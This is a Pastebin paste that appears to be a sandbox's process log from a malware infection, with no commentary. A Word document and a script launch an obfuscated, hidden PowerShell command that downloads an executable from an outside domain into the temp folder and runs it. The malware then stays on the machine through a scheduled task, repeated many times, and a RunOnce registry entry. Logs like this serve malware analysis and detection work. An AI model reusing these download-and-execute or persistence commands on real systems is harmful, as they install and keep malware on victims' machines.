Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- PoWERSHeLL.EXE -w HIDDEN -nop -Ep bYpaSs (New-OBJect SYsTeM.NEt.WeBCLienT).DOWNlOAdFILe('HtTP://gALErifhaFASHoP.Co.Id/load/Drvmg.exe','%TEMP%\\anyFileName.exe')
- WINWORD.EXE /n "C:\Specifications.doc" (PID: 3404)
- wscript.exe "C:\file.js" (PID: 2028)
- cmd.exe /c PoWERSHeLL.EXE -w HIDDEN -nop -Ep bYpaSs (New-OBJect SYsTeM.NEt.WeBCLienT).DOWNlOAdFILe('HtTP://gALErifhaFASHoP.Co.Id/load/Drvmg.exe','%TEMP%\\anyFileName.exe') & %TEMP%\\anyFileName.exe (PID: 3676)
- powershell.exe PoWERSHeLL.EXE -w HIDDEN -nop -Ep bYpaSs (New-OBJect SYsTeM.NEt.WeBCLienT).DOWNlOAdFILe('HtTP://gALErifhaFASHoP.Co.Id/load/Drvmg.exe','%TEMP%\\anyFileName.exe') (PID: 848)
- anyFileName.exe %TEMP%\\anyFileName.exe (PID: 2612)
- anyFileName.exe (PID: 2664)
- schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 2388)
- schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 2288)
- schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 3320)
- schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 3016)
- schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 3424)
- reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v "Client Monitor" /d "cmd /c """start """Client Monitor""" """%PROGRAMFILES%\Client\client.exe"""" /f" (PID: 2712)
- schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 3528)
- schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 3536)
- schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 3460)
- schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 2652)
- schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 1308)
- schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 3268)
- schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 3620)
- schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 1712)
- schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 172)
- schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 4092)
- schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 3760)
- schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 2052)
- schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 2120)
- schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 284)
- schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 2392)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
